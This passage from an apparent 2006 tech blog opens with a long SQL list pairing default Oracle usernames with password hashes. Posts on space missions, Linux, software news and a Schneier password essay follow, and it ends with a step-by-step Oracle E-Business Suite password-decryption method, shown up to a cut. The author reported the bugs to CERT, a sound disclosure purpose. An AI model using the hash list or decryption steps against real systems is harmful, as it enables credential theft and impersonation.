OR (username = 'PO7' AND password = '6B870AF28F711204')
OR (username = 'PO8' AND password = '7E15FBACA7CDEBEC')
OR (username = 'POA' AND password = '2AB40F104D8517A0')
OR (username = 'POM' AND password = '123CF56E05D4EF3C')
OR (username = 'PORTAL_DEMO' AND password = 'A0A3A6A577A931A3')
OR (username = 'PORTAL_SSO_PS' AND password = 'D1FB757B6E3D8E2F')
OR (username = 'PORTAL30' AND password = '969F9C3839672C6D')
OR (username = 'PORTAL30' AND password = 'D373ABE86992BE68')
OR (username = 'PORTAL30_ADMIN' AND password = '7AF870D89CABF1C7')
OR (username = 'PORTAL30_DEMO' AND password = 'CFD1302A7F832068')
OR (username = 'PORTAL30_PS' AND password = '333B8121593F96FB')
OR (username = 'PORTAL30_PUBLIC' AND password = '42068201613CA6E2')
OR (username = 'PORTAL30_SSO' AND password = '882B80B587FCDBC8')
OR (username = 'PORTAL30_SSO_ADMIN' AND password = 'BDE248D4CCCD015D')
OR (username = 'PORTAL30_SSO_PS' AND password = 'F2C3DC8003BC90F8')
OR (username = 'PORTAL30_SSO_PUBLIC' AND password = '98741BDA2AC7FFB2')
OR (username = 'POS' AND password = '6F6675F272217CF7')
OR (username = 'POWERCARTUSER' AND password = '2C5ECE3BEC35CE69')
OR (username = 'PRIMARY' AND password = '70C3248DFFB90152')
OR (username = 'PSA' AND password = 'FF4B266F9E61F911')
OR (username = 'PSB' AND password = '28EE1E024FC55E66')
OR (username = 'PSP' AND password = '4FE07360D435E2F0')
OR (username = 'PUBSUB' AND password = '80294AE45A46E77B')
OR (username = 'PUBSUB1' AND password = 'D6DF5BBC8B64933E')
OR (username = 'PV' AND password = '76224BCC80895D3D')
OR (username = 'QA' AND password = 'C7AEAA2D59EB1EAE')
OR (username = 'QDBA' AND password = 'AE62CB8167819595')
OR (username = 'QP' AND password = '10A40A72991DCA15')
OR (username = 'QS' AND password = '8B09C6075BDF2DC4')
OR (username = 'QS' AND password = '4603BCD2744BDE4F')
OR (username = 'QS' AND password = 'ACBD635B3A25405D')
OR (username = 'QS_ADM' AND password = '991CDDAD5C5C32CA')
OR (username = 'QS_ADM' AND password = '3990FB418162F2A0')
OR (username = 'QS_ADM' AND password = 'BB424460EFEC9080')
OR (username = 'QS_CB' AND password = 'CF9CFACF5AE24964')
OR (username = 'QS_CB' AND password = '870C36D8E6CD7CF5')
OR (username = 'QS_CB' AND password = 'A2A1265A6BDC8F36')
OR (username = 'QS_CBADM' AND password = '7C632AFB71F8D305')
OR (username = 'QS_CBADM' AND password = '20E788F9D4F1D92C')
OR (username = 'QS_CBADM' AND password = '58C823BA7A2D3D7F')
OR (username = 'QS_CS' AND password = '91A00922D8C0F146')
OR (username = 'QS_CS' AND password = '2CA6D0FC25128CF3')
OR (username = 'QS_CS' AND password = '5D85C7E8FB28375F')
OR (username = 'QS_ES' AND password = 'E6A6FA4BB042E3C2')
OR (username = 'QS_ES' AND password = '9A5F2D9F5D1A9EF4')
OR (username = 'QS_ES' AND password = '723007181C44715C')
OR (username = 'QS_OS' AND password = 'FF09F3EB14AE5C26')
OR (username = 'QS_OS' AND password = '0EF5997DC2638A61')
OR (username = 'QS_OS' AND password = '7ABBCF4BEB7854B2')
OR (username = 'QS_WS' AND password = '24ACF617DD7D8F2F')
OR (username = 'QS_WS' AND password = '0447F2F756B4F460')
OR (username = 'QS_WS' AND password = '8CF13718CDC81090')
OR (username = 'RE' AND password = '933B9A9475E882A6')
OR (username = 'REP_MANAGER' AND password = '2D4B13A8416073A1')
OR (username = 'REP_OWNER' AND password = '88D8F06915B1FE30')
OR (username = 'REP_OWNER' AND password = 'BD99EC2DD84E3B5C')
OR (username = 'REP_USER' AND password = '57F2A93832685ADB')
OR (username = 'REPADMIN' AND password = '915C93F34954F5F8')
OR (username = 'REPORTS_USER' AND password = '635074B4416CD3AC')
OR (username = 'REPORTS' AND password = '0D9D14FE6653CF69')
OR (username = 'RG' AND password = '0FAA06DA0F42F21F')
OR (username = 'RHX' AND password = 'FFDF6A0C8C96E676')
OR (username = 'RLA' AND password = 'C1959B03F36C9BB2')
OR (username = 'RLM' AND password = '4B16ACDA351B557D')
OR (username = 'RMAIL' AND password = 'DA4435BBF8CAE54C')
OR (username = 'RMAN' AND password = 'E7B5D92911C831E1')
OR (username = 'RRS' AND password = '5CA8F5380C959CA9')
OR (username = 'SAMPLE' AND password = 'E74B15A3F7A19CA8')
OR (username = 'SAP' AND password = 'BEAA1036A464F9F0')
OR (username = 'SAP' AND password = 'B1344DC1B5F3D903')
OR (username = 'SAPR3' AND password = '58872B4319A76363')
OR (username = 'SCOTT' AND password = 'F894844C34402B67')
OR (username = 'SCOTT' AND password = '7AA1A84E31ED7771')
OR (username = 'SDOS_ICSAP' AND password = 'C789210ACC24DA16')
OR (username = 'SECDEMO' AND password = '009BBE8142502E10')
OR (username = 'SERVICECONSUMER1' AND password = '183AC2094A6BD59F')
OR (username = 'SH' AND password = '9793B3777CD3BD1A')
OR (username = 'SH' AND password = '54B253CBBAAA8C48')
OR (username = 'SH' AND password = '1729F80C5FA78841')
OR (username = 'SITEMINDER' AND password = '061354246A45BBAB')
OR (username = 'SI_INFORMTN_SCHEMA' AND password = '84B8CBCA4D477FA3')
OR (username = 'SLIDE' AND password = 'FDFE8B904875643D')
OR (username = 'SPIERSON' AND password = '4A0A55000357BB3E')
OR (username = 'SSP' AND password = '87470D6CE203FB4D')
OR (username = 'STARTER' AND password = '6658C384B8D63B0A')
OR (username = 'STRAT_USER' AND password = 'AEBEDBB4EFB5225B')
OR (username = 'SWPRO' AND password = '4CB05AA42D8E3A47')
OR (username = 'SWUSER' AND password = '783E58C29D2FC7E1')
OR (username = 'SYMPA' AND password = 'E7683741B91AF226')
OR (username = 'SYS' AND password = 'D4C5016086B2DC6A')
OR (username = 'SYS' AND password = '43BE121A2A135FF3')
OR (username = 'SYS' AND password = '5638228DAF52805F')
OR (username = 'SYS' AND password = '8A8F025737A9097A')
OR (username = 'SYS' AND password = '4DE42795E66117AE')
OR (username = 'SYS' AND password = '66BC3FF56063CE97')
OR (username = 'SYS' AND password = '57D7CFA12BB5BABF')
OR (username = 'SYS' AND password = 'A9A57E819B32A03D')
OR (username = 'SYS' AND password = '2905ECA56A830226')
OR (username = 'SYS' AND password = '64074AF827F4B74A')
OR (username = 'SYS' AND password = '41B328CA13F70713')
OR (username = 'SYS' AND password = '0B4409DDD5688913')
OR (username = 'SYS' AND password = '6CFF570939041278')
OR (username = 'SYS' AND password = '3522F32DD32A9706')
OR (username = 'SYS' AND password = 'BE29E31B2B0EDA33')
OR (username = 'SYS' AND password = '5AC333703DE0DBD4')
OR (username = 'SYSADM' AND password = 'BA3E855E93B5B9B0')
OR (username = 'SYSADMIN' AND password = 'DC86E8DEAA619C1A')
OR (username = 'SYSMAN' AND password = '639C32A115D2CA57')
OR (username = 'SYSMAN' AND password = '447B729161192C24')
OR (username = 'SYSTEM' AND password = '8BF0DA8E551DE1B9')
OR (username = 'SYSTEM' AND password = '1B9F1F9A5CB9EB31')
OR (username = 'SYSTEM' AND password = 'D4DF7931AB130E37')
OR (username = 'SYSTEM' AND password = '2D594E86F93B17A1')
OR (username = 'SYSTEM' AND password = '4861C2264FB17936')
OR (username = 'SYSTEM' AND password = '970BAA5B81930A40')
OR (username = 'SYSTEM' AND password = '135176FFB5BA07C9')
OR (username = 'SYSTEM' AND password = 'E4519FCD3A565446')
OR (username = 'SYSTEM' AND password = '66A490AEAA61FF72')
OR (username = 'SYSTEM' AND password = '10B0C2DA37E11872')
OR (username = 'SYSTEM' AND password = 'D5DD57A09A63AA38')
OR (username = 'SYSTEM' AND password = '69C27FA786BA774C')
OR (username = 'SYSTEM' AND password = '86FDB286770CD4B9')
OR (username = 'SYSTEM' AND password = 'B171042374D7E6A2')
OR (username = 'SYSTEM' AND password = 'D7C18B3B3F2A4D4B')
OR (username = 'TAHITI' AND password = 'F339612C73D27861')
OR (username = 'TALBOT' AND password = '905475E949CF2703')
OR (username = 'TDOS_ICSAP' AND password = '7C0900F751723768')
OR (username = 'TEC' AND password = '9699CFD34358A7A7')
OR (username = 'TEST' AND password = '26ED9DD4450DD33C')
OR (username = 'TEST' AND password = '7A0F2B316C212D67')
OR (username = 'TEST_USER' AND password = 'C0A0F776EBBBB7FB')
OR (username = 'TESTPILOT' AND password = 'DE5B73C964C7B67D')
OR (username = 'THINSAMPLE' AND password = '5DCD6E2E26D33A6E')
OR (username = 'TIBCO' AND password = 'ED4CDE954630FA82')
OR (username = 'TIP37' AND password = 'B516D9A33679F56B')
OR (username = 'TRACESVR' AND password = 'F9DA8977092B7B81')
OR (username = 'TRAVEL' AND password = '97FD0AE6DFF0F5FE')
OR (username = 'TSDEV' AND password = '29268859446F5A8C')
OR (username = 'TSUSER' AND password = '90C4F894E2972F08')
OR (username = 'TURBINE' AND password = '76F373437F33F347')
OR (username = 'ULTIMATE' AND password = '4C3F880EFA364016')
OR (username = 'UM_ADMIN' AND password = 'F4F306B7AEB5B6FC')
OR (username = 'UM_CLIENT' AND password = '82E7FF841BFEAB6C')
OR (username = 'USER' AND password = '74085BE8A9CF16B4')
OR (username = 'USER_NAME' AND password = '96AE343CA71895DA')
OR (username = 'USER0' AND password = '8A0760E2710AB0B4')
OR (username = 'USER1' AND password = 'BBE7786A584F9103')
OR (username = 'USER2' AND password = '1718E5DBB8F89784')
OR (username = 'USER3' AND password = '94152F9F5B35B103')
OR (username = 'USER4' AND password = '2907B1BFA9DA5091')
OR (username = 'USER5' AND password = '6E97FCEA92BAA4CB')
OR (username = 'USER6' AND password = 'F73E1A76B1E57F3D')
OR (username = 'USER7' AND password = '3E9C94488C1A3908')
OR (username = 'USER8' AND password = 'D148049C2780B869')
OR (username = 'USER9' AND password = '0487AFEE55ECEE66')
OR (username = 'UTILITY' AND password = '81F2423D6811246D')
OR (username = 'USUARIO' AND password = '1AB4E5FD2217F7AA')
OR (username = 'UTLBSTATU' AND password = 'C42D1FA3231AB025')
OR (username = 'VEA' AND password = 'D38D161C22345902')
OR (username = 'VEH' AND password = '72A90A786AAE2914')
OR (username = 'VERTEX_LOGIN' AND password = 'DEF637F1D23C0C59')
OR (username = 'VIDEOUSER' AND password = '29ECA1F239B0F7DF')
OR (username = 'VIF_DEVELOPER' AND password = '9A7DCB0C1D84C488')
OR (username = 'VIRUSER' AND password = '404B03707BF5CEA3')
OR (username = 'VPD_ADMIN' AND password = '571A7090023BCD04')
OR (username = 'VRR1' AND password = '811C49394C921D66')
OR (username = 'VRR1' AND password = '3D703795F61E3A9A')
OR (username = 'VRR1' AND password = '3DA1893A5FCA23BF')
OR (username = 'WEBCAL01' AND password = 'C69573E9DEC14D50')
OR (username = 'WEBDB' AND password = 'D4C4DCDD41B05A5D')
OR (username = 'WEBREAD' AND password = 'F8841A7B16302DE6')
OR (username = 'WEBSYS' AND password = 'A97282CE3D94E29E')
OR (username = 'WEBUSER' AND password = 'FD0C7DB4C69FA642')
OR (username = 'WEST' AND password = 'DD58348364219102')
OR (username = 'WFADMIN' AND password = 'C909E4F104002876')
OR (username = 'WH' AND password = '91792EFFCB2464F9')
OR (username = 'WIP' AND password = 'D326D25AE0A0355C')
OR (username = 'WKADMIN' AND password = '888203D36F64C5F6')
OR (username = 'WKPROXY' AND password = 'AA3CB2A4D9188DDB')
OR (username = 'WKPROXY' AND password = 'B97545C4DD2ABE54')
OR (username = 'WKSYS' AND password = '69ED49EE1851900D')
OR (username = 'WKPROXY' AND password = '18F0B0E50B9F7B12')
OR (username = 'WKSYS' AND password = '545E13456B7DDEA0')
OR (username = 'WKUSER' AND password = '8B104568E259B370')
OR (username = 'WK_SYS' AND password = '79DF7A1BD138CF11')
OR (username = 'WK_TEST' AND password = '29802572EB547DBF')
OR (username = 'WK_PROXY' AND password = '3F9FBD883D787341')
OR (username = 'WMS' AND password = 'D7837F182995E381')
OR (username = 'WMSYS' AND password = '7C9BA362F8314299')
OR (username = 'WOB' AND password = 'D27FA6297C0313F4')
OR (username = 'WPS' AND password = '50D22B9D18547CF7')
OR (username = 'WSH' AND password = 'D4D76D217B02BD7A')
OR (username = 'WSM' AND password = '750F2B109F49CC13')
OR (username = 'WWW' AND password = '6DE993A60BC8DBBF');






COROT launch

On 27 December, COROT is to be launched into space on a unique astronomy mission: its twin goals are to detect exoplanets orbiting around other stars and to probe the mysteries of stellar interiors as never before. COROT is a French national space agency (CNES)-led mission to which the European Space Agency and European partners are adding a particularly strong international flavour.

While CNES is completing preparations for the launch from Baikonur/Kazakhstan, ESA and a large number of European scientists involved in the mission are eagerly awaiting this event and the first scientific results to come through.


What is COROT?

COROT stands for ‘Convection Rotation and planetary Transits’. The name describes the mission’s scientific goals. ‘Convection and rotation’ refer to the satellite’s capability to probe stellar interiors, studying the acoustic waves that ripple across the surface of stars, a technique called asteroseismology. ‘Transit’ refers to the technique whereby the presence of a planet orbiting a star can be inferred from the dimming starlight caused when the planet passes in front of it. To achieve its twin scientific objectives, COROT will monitor some 120,000 stars with its 30-centimetre telescope.

COROT will lead a bold new search for planets around other stars. In the decade since the first discovery in 1995 of an exoplanet 51 Pegasi b, more than 200 other such planets outside our solar system have been detected using ground-based observatories. The COROT space telescope promises to find many more during its two-and-a-half-year mission, expanding the frontiers of our knowledge towards ever-smaller planets.

Many of the planets COROT will detect are expected to be 'hot Jupiters', gaseous worlds. An unknown percentage of those detected are expected to be rocky planets, maybe just a few times larger than the Earth (or smaller, even). If COROT finds such planets, they will constitute a new class of planet altogether.

While it is looking at a star, COROT will also be able to detect 'starquakes', acoustic waves generated deep inside a star that send ripples across its surface, altering its brightness. The exact nature of the ripples allows astronomers to calculate the star's precise mass, age and chemical composition.

COROT’s European dimension

The COROT mission was first proposed by CNES back in 1996. A call for potential European partners was issued in 1999. CNES gave the green light to build the spacecraft in 2000 and is now leading the mission. Its international partners are ESA, Austria, Belgium, Germany, Spain and Brazil.

CNES is responsible for the overall system and for the launch contract with Franco-Russian company Starsem, which is providing the Soyuz launch service.

The contributions of the other international partners range from the provision of hardware items to ground stations, complementary ground-based observation of targets to be studied by COROT and analysis of the scientific data to come.

ESA is playing a crucial role in the mission. It has contributed the optics for the telescope positioned at the heart of the spacecraft and has carried out payload testing. The telescope's baffle was developed by a team at ESA's technical centre ESTEC. ESA has also provided the onboard data processing units. And under this truly collaborative effort, a number of scientists from various European countries - Denmark, Switzerland, the United Kingdom and Portugal - have been selected as Co-Investigators following open competition. As a result of ESA's participation, scientists from its Member States will also be given access to COROT data.

Hitchhiking around in Europe.

Hitchhiking, maybe for some people it sounds romantic, for some it sounds as something for a hippy and for some it sounds as the start of a competition.

I think I will fitt into the last category. I have hitchhiked around Europe myself several times, some times to get a quick, cheap and exiting trip to the other side of Europe in some other cases to get as fast as possible to the other side of Europe in a competition. Before it became a TV show we where traveling for free over the roads of Europe.

I just found that the website of the hitchhiking race is still up and running. Take a look especially for the nice pictures.


Friday, December 22, 2006

VGA=771 parameter for Debian installation.

So it turns out that in the end my installation of Debian Sarge on my HP Pavilion ZE2000 laptop could be done by using the parameter VGA=771.

I have been trying to install a Debian Sarge distribution on this laptop and encountered the problem that after the first steps of the installation the system would freeze and give a black screen.

Consulting the help files gave the hint that starting with the parameter VGA=771 could bypass a common laptop problem of not recognizing the screen and resolution type during boot.

The `vga=' Argument:
Note that this is not really a boot argument. It is an option that is interpreted by LILO and not by the kernel like all the other boot arguments are. However its use has become so common that it deserves a mention here. It can also be set via using rdev -v or equivalently vidmode on the vmlinuz file. This allows the setup code to use the video BIOS to change the default display mode before actually booting the Linux kernel. Typical modes are 80x50, 132x44 and so on. The best way to use this option is to start with vga=ask which will prompt you with a list of various modes that you can use with your video adapter before booting the kernel. Once you have the number from the above list that you want to use, you can later put it in place of the `ask'. For more information, please see the file linux/Documentation/svga.txt that comes with all recent kernel versions.

Note that newer kernels (v2.1 and up) have the setup code that changes the video mode as an option, listed as Video mode selection support so you need to enable this option if you want to use this feature.

Wednesday, December 20, 2006

Real-World Passwords.

This article was originally done by by Bruce Schneier, founder and CTO of BT Counterpane and appeared in the CRYPTO-GRAM newsletter. CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

How good are the passwords people are choosing to protect their computers and online accounts?

It's a hard question to answer because data is scarce. But recently, a colleague sent me some spoils from a MySpace phishing attack: 34,000 actual user names and passwords.

The attack was pretty basic. The attackers created a fake MySpace login page, and collected login information when users thought they were accessing their own account on the site. The data was forwarded to various compromised web servers, where the attackers would harvest it later.

MySpace estimates that more than 100,000 people fell for the attack before it was shut down. The data I have is from two different collection points, and was cleaned of the small percentage of people who realized they were responding to a phishing attack. I analyzed the data, and this is what I learned.

Password Length: While 65% of passwords contain eight characters or less, 17% are made up of six characters or less. The average password is eight characters long.

Specifically, the length distribution looks like this:

1-4 0.82%
5 1.1%
6 15%
7 23%
8 25%
9 17%
10 13%
11 2.7%
12 0.93%
13-32 0.93%

Yes, there's a 32-character password:
"1ancheste23nite41ancheste23nite4." Other long passwords are "fool2thinkfool2thinkol2think" and "dokitty17darling7g7darling7."

Character Mix: While 81% of passwords are alphanumeric, 28% are just lowercase letters plus a single final digit -- and two-thirds of those have the single digit 1. Only 3.8% of passwords are a single dictionary word, and another 12% are a single dictionary word plus a final digit -- once again, two-thirds of the time that digit is 1.

numbers only 1.3%
letters only 9.6%
alphanumeric 81%
non-alphanumeric 8.3%

Only 0.34% of users have the username portion of their e-mail address as their password.

Common Passwords: The top 20 passwords are (in order): password1, abc123, myspace1, password, blink182, qwerty1, fuckyou, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1 and monkey.

The most common password, "password1," was used in 0.22% of all accounts. The frequency drops off pretty fast after that: "abc123" and "myspace1" were only used in 0.11% of all accounts, "soccer" in 0.04% and "monkey" in 0.02%.

For those who don't know, Blink 182 is a band. Presumably lots of people use the band's name because it has numbers in its name, and therefore it seems like a good password. The band Slipknot doesn't have any numbers in its name, which explains the 1. The password "jordan23" refers to basketball player Michael Jordan and his number. And, of course, "myspace" and "myspace1" are easy-to-remember passwords for a MySpace account. I don't know what the deal is with monkeys.

We used to quip that "password" is the most common password. Now it's "password1." Who said users haven't learned anything about security?

But seriously, passwords are getting better. I'm impressed that less than 4% were dictionary words and that the great majority were at least alphanumeric. Writing in 1989, Daniel Klein was able to crack 24% of his sample passwords with a small dictionary of just 63,000 words, and found that the average password was 6.4 characters long.

And in 1992 Gene Spafford cracked 20% of passwords with his dictionary, and found an average password length of 6.8 characters. (Both studied Unix passwords, with a maximum length at the time of 8 characters.) And they both reported a much greater percentage of all lowercase, and only upper- and lowercase, passwords than emerged in the MySpace data. The concept of choosing good passwords is getting through, at least a little.

On the other hand, the MySpace demographic is pretty young. Another password study in November looked at 200 corporate employee passwords: 20% letters only, 78% alphanumeric, 2.1% with non-alphanumeric characters, and a 7.8-character average length. Better than 15 years ago, but not as good as MySpace users. Kids really are the future.

None of this changes the reality that passwords have outlived their usefulness as a serious security device. Over the years, password crackers have been getting faster and faster. Current commercial products can test tens -- even hundreds -- of millions of passwords per second. At the same time, there's a maximum complexity to the passwords average people are willing to memorize. Those lines crossed years ago, and typical real-world passwords are now software-guessable. AccessData's Password Recovery Toolkit -- at 200,000 guesses per second -- would have been able to crack 23% of the MySpace passwords in 30 minutes, 55% in 8 hours. Of course, this analysis assumes that the attacker can get his hands on the encrypted password file and work on it offline, at his leisure; i.e., that the same password was used to encrypt an e-mail, file or hard drive. Passwords can still work if you can prevent offline password-guessing attacks, and watch for online guessing. They're also fine in low-value security situations, or if you choose really complicated passwords and use something like Password Safe to store them. But otherwise, security by password alone is pretty risky.

MySpace Attack
http://www.infoworld.com/infoworld/article/06/10/27/HNphishingmyspace_1.html
http://news.netcraft.com/archives/2006/10/27/myspace_accounts_compromised_by_phishers.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html

Another analysis of the same data:
http://www.infoworld.com/article/06/11/17/47OPsecadvise_1.html

Other password studies:
http://www.deter.com/unix/papers/passwords_klein.ps.gz
http://ftp.cerias.purdue.edu/pub/papers/gene-spafford/spaf-OPUS-observe.pdf
http://www.fredstie.com/thesis/survey/survey_report.pdf
http://download.lawr.ucdavis.edu/pub/CambridgePWStudy.pdf

Password cracking:
http://www.lockdown.co.uk/?pg=combi&s=articles
http://www.accessdata.com/products/decryption/

Password Safe:
http://passwordsafe.sourceforge.net/

This essay originally appeared on Wired.com.

Asteroid Detection by Radar

They are the celestial equivalent of sonograms. But their hazy outlines and ghostly features do not document the in-vivo development of a future taxpayer. Instead, they chronicle the exo-planetary comings-and-goings of some of Earth's least known, most nomadic, and at times most impactful neighbors.

They are radar echoes that are bounced off of asteroids. Scientists from NASA's Jet Propulsion Laboratory and around the world rely on their ethereal images to tell some out-of-this-world tales of near-Earth objects.

"The standard ground-based tools for asteroid science require a night's sky, and what you come away with in the end is an image of a dot," said JPL radar astronomer Dr. Steve Ostro. "With radar astronomy, the sky at high noon is just as inviting as that at midnight, and without launching a full-blown space mission we can actually get valuable information about the physical makeup of these objects."

In some respects, radar astronomy utilizes the same technology as your microwave oven. But do not bother to haul your glorified croissant warmer outside -- it will just confuse the neighbors. Radar astronomy employs the world's most massive dish-shaped antennas, which beam directed microwave signals at their targets, which can be as close as our moon and as far away as the moons of Saturn. These pulses bounce off the target, and the resulting "echo" is collected and precisely collated. The results can be astounding.

"The closer the target, the better the echo," said Ostro. "From them we can generate detailed three-dimensional models of the object, define its rotation precisely and get a good idea of its internal density distribution. You can even make out surface features. A good echo can give us a spatial resolution finer than 10 meters."

Radar astronomy has detected echoes from over 190 near-Earth asteroids to date and has found that, like snowflakes, no two are the same. The returning echoes have revealed both stony and metallic objects, some flying through the cold, dark reaches of space alone, while others have their own satellites. The data indicate that some asteroids have a very smooth surface, while others have very coarse terrain. And finally, their shapes are virtually anything that can be imagined.

One thing that does not have to be imagined is radar astronomy's ability to nail down the location of an object in time and space. This invaluable capability came in handy in the winter of 2004 when JPL's Near-Earth Object office was looking for a potentially hazardous asteroid called Apophis.

Discovered by astronomers using optical telescopes, Apophis quickly drew the interest of the near-Earth object monitoring community when its initial orbital plots indicated there was a possibility the 1,300-foot-wide chunk of space rock could impact Earth in 2029. The Near-Earth Object office knew what was needed was more detailed information about Apophis' location, which they could then use to plot out a more accurate orbit.

Under the watchful eye of Ostro and three other radar astronomers, microwaves from the Arecibo Observatory in Puerto Rico reached out and touched asteroid Apophis on Jan. 27, 29, and 30, 2005. The Arecibo data significantly improved the asteroid's orbital estimate, ruling out a potential Earth collision in 2029.

The 1,000-foot diameter Arecibo telescope is one of only two places in the world where radar astronomy is effectively performed. The other is at the 70-meter Goldstone antenna in California's Mojave Desert. The two instruments are complementary. The Arecibo radar is not fully steerable (while Goldstone is), but it is 30 times more sensitive. Together they make a formidable asteroid reconnaissance team.

The future of radar astronomy may be just as amazing as some of the images and shape models of nearby space objects that its practitioners have already obtained. There is new technology in the pipeline that will allow imaging of surface features with up to four times more detail than what exists today. And then there are proposals on the table for a potential space mission to a near-Earth asteroid. Candidate asteroids for said mission will need to be pre-approved via detail scientific analysis. The kind of scientific analysis you can only get with radar astronomy.

Monday, December 18, 2006

Download Adobe Photoshop CS3 Beta

For the first time ever, Adobe is delivering a widely available Photoshop CS3 beta to enable customers to more easily transition to the latest hardware platforms, particularly Apple's new Intel based systems. The beta is available as a Universal Binary for the Macintosh platform as well for Microsoft Windows XP and Windows Vista computers, with the final shipping release of Adobe Photoshop CS3 planned for spring 2007.

The Photoshop CS3 beta is available in English only but to Photoshop CS2 users worldwide. It is available to licensed users of either the Photoshop CS2 (full, upgrade, and education), Adobe Creative Suite 2 Standard or Premium (full, upgrade, and education), Adobe Production Studio Standard and Premium (full, upgrade, and education), Adobe Video Bundle (full, upgrade, and education) or Adobe Web Bundle (full, upgrade, and education). You will need to provide your Photoshop CS2, Creative Suite, Production Studio or Bundle serial number in order to get a Photoshop CS3 beta serial number, enabling you to activate the Photoshop beta and use it beyond the two-day grace period.

you can download the software from the Adobe labs website.

flickr.com

It took some time but finally I have joined the Flickr community. I devoted last weekend some time on cleaning my disks and found a lot of photo’s that where still there and which I still wanted to show to some people. Also a lot of photo’s which I made for some reason resided on my disks.

I decided to clean up some of the mess and make a centralized online storage location. After looking into some possibilities of hosting them on the terminalcult webserver. However, keeping up with patching, maintaining and all the alike made me decide to give flickr a try. I have to say, until now I think it is quite a nice web interface, there are some disadvantage with a non-paying account but I think I can live with those for now.

My photo’s can be found at: http://www.flickr.com/photos/14436073@N00/


Sunday, December 17, 2006

CERT is picking up speed.

As you have been able to read in this blog I have found 2 separate security bugs in Oracle Software. One security bug is about Oracle iStore where users are able to view the order information of other customers. This is enabling a user to view what all other customer have purchased, to which address it is shipped and to which address the bill is send. Also the cost information and what kind of payment type there was used, credit card for example. The security bug is simply to exploit on every webshop that is making use of Oracle iStore and did not enable URL encryption.

The solution is somewhat vague in mentioned in the Oracle iStore implementation guide. It can be found under the section of cookie encryption. By enabling the encryption in the CRM module the URL’s will also be partly encrypted and prevent users from URL manipulation. However this is still not a complete solution but rather a workaround in my opinion. On my website you can find some hints about how you can make a more stable fix.

The second security bug is about a password decryption vulnerability in Oracle E-Business Suite. By manipulating a PL/SQL package someone can decrypt all stored user passwords. By using a java function you can even bypass this manipulation of the PL/SQL package and do it on a separate computer. This is compromising the integrety of the E-Business Suite and makes it possible for users to pretend that they are a other user. For example upgrading there salary scale as if they where someone of the Human Resource department or give huge discounts on products for particular customers. That is besides the potential danger of people leaking information. I have described the bug in somewhat more detail in this posting.

Because of the potential danger of both the bugs I have send out separate mails to CERT and the Dutch CERT to inform them about the bugs. From both I have received mails back. The Dutch reported that they have noted the bug and that they would inform Oracle, after this only silence was heard. The American CERT organization however send me a mail that they received the security thread mail and gave me 2 separate tracking numbers to which I could refer when I communicated with them about this. Not only that but at this moment I keep receiving mails from CERT about the bugs, and I some questions from Oracle about some technical details of the bug and how to solve this in the best way. So CERT is playing the middle man in the solving of this thread. I still have to wait and see what will come out of this and if Oracle will release a patch but I surely hope so, especially for the iStore bug because at this moment there are several web stores active that are vulnerable to this exploit.

Also I noted that the number of visitors to my website terminalcult.org and to this weblog is grown enormous. And from this a large number of the visitors are coming from the Oracle Company. Shame is still that I did not have had direct contact with Oracle but that CERT is still playing the middle man. I understand this and it might be a good solution however it might speed up things if there was some more direct contact. We will wait and see how things will play out in the upcoming days.


Thursday, December 14, 2006

Sun Solaris 10 V11/06

As some of you might know or not know I am a member of the Sun Microsystems Operating System Beta test team. Meaning that we are testing Sun Solaris before it becomes available for the general public. I am very happy to announce that a new version is shipping. See also the mail about it:


From: Wyatt Gale [mailto:XXXXXXXX@sun.com]
Sent: maandag 11 december 2006 21:42
To: Johan Louwers
Subject: Solaris 10 11/06 RR

Dear Johan

We are pleased to announce the successful RR of the Solaris 10 11/06.

Solaris 10 11/06 downloadable images are located at the following URL: http://www.sun.com/software/solaris/

Thank You
Solaris 10 11/06 Beta Program Management



Meaning you can donwload the latest version of Sun Solaris 10 V11/06 from the following location: http://www.sun.com/software/solaris/



Monday, December 11, 2006

Oracle Applications Passwords Decryption Vulnerability.

Oracle Applications is currently one of the leading ERP systems and used by medium and large sized companies around the world. As those companies base their trust in this ERP platform for their day-to-day business, they also put their trust in the way Oracle Applications handles the security and authentication. If this trust is based on hard facts or upon a feeling is questionable, looking at the authentication mechanism it comes to mind that this trust is based upon a feeling.

As part of a customization project I had to take a close look at the way Oracle Applications creates new user accounts. The reason that made me investigate deeper into the mechanism of user authentication was the discovery that Oracle apps is not storing a hash value of the password, instead Oracle is storing the complete password in an encrypted form in the database. The encrypted passwords can be found by querying the table FND_USER table:

/*--------------------------------------------------------------*/
select * from fnd_user;
/*--------------------------------------------------------------*/

As there is no password hash stored the user authentication has to be done on the real password. To compare the password entered by the user against the stored encrypted password Oracle is decrypting the stored encrypted password first. Meaning the mechanism has to have access to a decryption algorithm. To decrypt and verify user passwords Oracle apps make use of the FND_WEB_SEC package which can be found in the oracle Apps schema. The DECRYPT function in the FND_WEB_SEC package is a local function and cannot be called from outside the package:

/*--------------------------------------------------------------*/
-- Decrypt function in the FND_WEB_SEC package.
function decrypt(key in varchar2, value in varchar2)
return varchar2
as language java name 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
/*--------------------------------------------------------------*/

To make the function available outside the package the package specification has to be altered and the following lines have to added to the package specifications:

/*--------------------------------------------------------------*/
function decrypt(key in varchar2, value in varchar2)
return varchar2;
/*--------------------------------------------------------------*/

After altering this we have access to the DECRYPT function from outside the package and we can call the function and use it. For the function to work correctly there are two required values, the first value is the decryption key the second is the encrypted password which you want to be decrypted. The encrypted password can be found under “FND_USER.ENCRYPTED_USER_PASSWORD”. The decryption key for the user password is the decrypted “ENCRYPTED_FOUNDATION_PASSWORD” of the guest user.

Meaning that the first step to decrypt the user password is to decrypt the foundation password of the guest user. When Oracle Apps is verifying a login attempt it will also needs to perform those steps so we can find the standard Oracle approach of decrypting the foundation password in the FND_WEB_SEC package under the function “get_foundation_password”.

Looking at the FND_WEB_SEC.get_foundation_password function teaches us that the decryption key to decrypt ”ENCRYPTED_FOUNDATION_PASSWORD” of the guest user is the password of the guest user. This password is stored, together with the username of the guest user, under the Oracle profile option GUEST_USER_PWD. Executing the following query can retrieve the profile option value.
/*--------------------------------------------------------------*/
SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual;
/*--------------------------------------------------------------*/
Having the value of this profile option will enable you to decrypt the foundation password of the guest user, which can be used as the decryption key for the other user passwords. In the example below the foundation password of the guest user is retrieved from the database:

/*--------------------------------------------------------------*/
SELECT(
SELECT
